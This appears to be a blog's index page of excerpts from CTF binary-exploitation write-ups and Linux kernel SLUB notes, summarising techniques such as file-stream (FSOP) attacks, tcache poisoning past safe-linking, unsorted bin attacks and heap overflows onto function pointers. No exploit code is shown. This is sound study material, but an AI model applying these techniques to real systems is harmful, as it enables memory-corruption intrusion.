[SECCON CTF 2022 Quals] babyfile

Introduction babyfile is a file stream exploitation I did during the SECCON CTF 2022 Qualsevent. I didn’t succeed to flag it within the 24 hours :(. But anyway I hope this write up will be interesting to read given I show another way to gain code execution – I have not seen before – based on _IO_obstack_jumps! The related files can be found here. If you’re not familiar with file stream internals, I advice you to read my previous writeups about file stream exploitation, especially this oneand this other one.
Read full post gblog_arrow_right

Linux file stream internals for fun and profit

Introduction File streams are now a very common attack surface, here is a high level introduction that should make you understand the design of known attacks beyond the code reading for a particular function. I already talked about FSOP here. This article reviews glibc 2.36. Most of this article comes from thisawesome series of articles about the _IO_FILE strcuture. Introduction Global design Common functions fopen fread _IO_file_xsgetn_mmap Global design As said in my previous writeup:
Read full post gblog_arrow_right

[corCTF 2022 - pwn] zigzag

Introduction zigzag is a zig heap challenge I did during the corCTF 2022event. It was pretty exotic given we have to pwn a heap like challenge written in zig. It is not using the C allocator but instead it uses the GeneralPurposeAllocator, which makes the challenge even more interesting. Find the tasks here. TL; DR Understanding zig GeneralPurposeAllocator internals Hiijack the BucketHeader of a given bucket to get a write what were / read what where primitive.
Read full post gblog_arrow_right

[corCTF 2022 - pwn] cshell2

Introduction cshell2 is a heap challenge I did during the corCTF 2022event. It was pretty classic so I will not describe a lot. If you begin with heap challenges, I advice you to read previous heap writeup. TL; DR Fill tcache. Heap overflow in edit on the bio field which allows to leak the address of the unsortedbin. Leak heap and defeat safe-linking to get an arbitrary write through tcache poisoning.
Read full post gblog_arrow_right

[diceCTF 2022 - pwn] catastrophe

Introduction I just learned how to use malloc and free… am I doing this right? catastrophe is a heap challenge I did during the diceCTF 2022. I did have a lot of issues with the libc and the dynamic linker, thus I did a first time the challenge with the libc that was in /lib/libc.so.6, then I figured out thanks to my teammate supersnailthat I was using the wrong libc.
Read full post gblog_arrow_right

[Linux kernel side notes - SLUB] kmem_cache

Introduction The kmem_cache structure is one of the main structures of the SLUB algorithm. It contains pointers to other structures (cpu_slab, node array) and informations about the cache it describes (object_size, name). Every notes target linux kernel 5.18.12. Overview of its role among the allocation process: Let’s dig into Here is the definition of the kmem_cache structure: // https://elixir.bootlin.com/linux/latest/source/include/linux/slub_def.h#L90 /* * Slab cache management.
Read full post gblog_arrow_right

Linux kernel side notes

Here are just some side notes about linux kernel internals I put here to avoid to have to learn same things again and again. Every notes target linux kernel 5.18.12. There will be a lot of code for which I do not comment the whole part. Kernel heap management (SLUB, SLAB, SLOB) Same way as for userland, the kernel has many algorithms to manage memory allocation according to what the kernel is looking for (huge resources or not, safety needs etc).
Read full post gblog_arrow_right

[HackTheBox Cyber Apocalypse 2022 - pwn] Once and for all

Once for all is a heap challenge I did during the HackTheBox Cyber Apocalypse event. This is a classic unsorted bin attack plus a FSOP on stdin. Find the tasks and the final exploit hereand here. Reverse engineering All the snippets of pseudo-code are issued by IDA freeware: int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+18h] [rbp-8h] BYREF int i; // [rsp+1Ch] [rbp-4h] for ( i = 0; i <= 49; ++i ) { puts(s); printf(&unk_1310); __isoc99_scanf(&unk_13C8, &v4); puts(s); switch ( v4 ) { case 1: small_alloc(s); break; case 2: fix(s); break; case 3: examine(s); break; case 4: savebig(s); break; case 5: exit(0); default: puts("[-] Invalid choice!
Read full post gblog_arrow_right

[pwnable - pwn] Bookwriter

What we can do In the edit feature, we can overwrite the bytes right after any chunk up to the NULL byte. In the alloc handler, it iterates once too may times through the alloc array, which means it can overlap on the first entry of the size array with a huge size which would be a chunk address, then we can easily trigger large heap overflow.
Read full post gblog_arrow_right

[DCTF 2022 - pwn] phonebook

Intro phonebook is a basic heap challenge I did during the dctf event. It’s basically just a heap overflow wich allows us to overflow a function pointer with for example the address of system. The bug $ ./phonebook Choose an option: [1-5] 1. Store someone's information 2. Edit information 3. Call someone 4. Unfriend someone 5. Add the hidden_note > We can create an entity and then initialize: a name, a numero and a function pointer.
Read full post gblog_arrow_right